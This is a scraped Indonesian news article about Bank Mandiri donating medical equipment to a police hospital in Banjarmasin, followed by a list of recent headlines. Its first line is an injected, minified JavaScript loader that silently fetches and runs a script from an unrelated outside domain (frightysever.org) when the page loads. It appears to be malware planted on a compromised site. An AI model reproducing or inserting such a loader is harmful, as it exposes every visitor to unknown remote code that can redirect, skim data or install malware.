(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Direktur Operasional PT Bank Mandiri Serahkan Hibah Alkes ke RS Bhayangkara Banjarmasin


BANJARMASIN, Bank Mandiri serahkan hibah bantuan alat kesehatan (Alkes) kepada Rumah Sakit Bhayangkara Tingkat III Polda Kalsel melalui program Corporate Social Responsibility (CSR). Penyerahan hibah bantuan alat-alat kesehatan dari Bank Mandiri untuk menunjang kinerja Rumah Sakit Bhayangkara dalam penanganan medis dan pelayanan kesehatan masyarakat, berlangsung di Mapolda Kalsel, Jum’at (23/2) siang.

Direktur Operasional PT Bank Mandiri Ogi Prastomiyono mengatakan, atas nama Bank Mandiri mengucapkan terima kasih atas kesempatan yang diberikan kepada Bank Mandiri untuk bekerja sama dengan Kepolisian Daerah Kalimantan Selatan, berupa kerjasama bina lingkungan dengan Rumah Sakit Bhayangkara Banjarmasin dalam upaya meningkatkan layanan kesehatan di wilayah Kalimantan Selatan.

Bantuan alat-alat kesehatan yang diserahkan yaitu Elektronik Physical Therapy And Rehab Bike, Infred Lamp Type: 3 Lampu, CPAP Infant Neonatus, Elektro Kardiograph, Tensi Digital Omron dan Tensi Mobile Riester, dengan total nilai sebesar Rp 250 juta.

“Kami (Bank Mandiri, red) berharap melalui bantuan ini, kebutuhan masyarakat dan Polri untuk mendapatkan layanan kesehatan yang lebih baik dapat terpenuhi. Bantuan kesehatan ini akan dimanfaatkan untuk mendukung peningkatan operasional Rumah Sakit Bhayangkara Banjarmasin. Merupakan wujud penghormatan PT Bank Mandiri terhadap aktivitas dan layanan kesehatan,” ujar Ogi Prastomiyono.

“Bantuan kami berikan tidaklah besar, namun kami berharap dengan bantuan ini masyarakat dapat menikmati layanan kesehatan melalui Rumah Sakit Bhayangkara Banjarmasin yang memadai dan mudah diakses, serta mampu mendorong masyarakat untuk meningkatkan kualitas kesehatan manjadi lebih baik,” jelasnya.


Foto : ammar

Wakapolda Kalsel Kombes Pol Nasri SIK MH mengucapkan terima kasih banyak kepada PT Bank Mandiri yang memberikan hibah berupa alat-alat kesehatan kepada Rumah Sakit Bhayangkara Banjarmasin guna menunjang pelayanan kesehatan kepada personil maupun warga Kalimantan Selatan. “Karena Rumah Sakit Bhayangkara Banjarmasin bukan hanya milik kepolisian juga milik masyarakat banyak,” kata Wakapolda Kalsel.

“Selain itu, PT Bank Mandiri juga membantu kita, karena aset rumah Wakapolda itu dekat dengan gedung Bank Mandiri dan pembangunan masjid dengan biaya kurang lebih Rp 4 miliar yang dekat sekali dengan rumah Wakapolda dan khusus dibuatkan pintu dari rumah Wakapolda ke masjid langsung, sungguh saya pribadi sangat berterima kasih,” ungkapnya.

Wakapolda Kalsel mengaharapkan dengan adanya barang hibah berupa alat-alat kesehatan dari PT Bank Mandiri dapat dirawat dengan baik. Bisa dipergunakan dengan baik agar nanti bisa terus membantu masyarakat yang memerlukan pertolongan cepat.

Turut berhadir di acara penyerahan bantuan ini, Irwasda Kombes Pol Drs Djoko Poerbohadijojo MSi, Kabiddokkes AKBP dr Erwin Zainul Hakim MARS MHKes, Karumkit RS Bhayangkara Banjarmasin AKBP dr Bambang Pitoyo Nugroho SpS beserta sejumlah perwira Polda Kalsel.

Sementara dari pihak Bank Mandiri Anton Zukarnain, Region CEO Bank Mandiri IX Kalimantan, RTCH Region IX Kalimantan, Ariotejo Bayuaji, ROH Region IX Kalimantan beserta para pejabat layer 3 Area Head Banjarmasin Adhy Mulya. (ammar)

Reporter : Ammar
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

5 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

6 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

9 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

10 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

11 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

13 jam ago

This website uses cookies.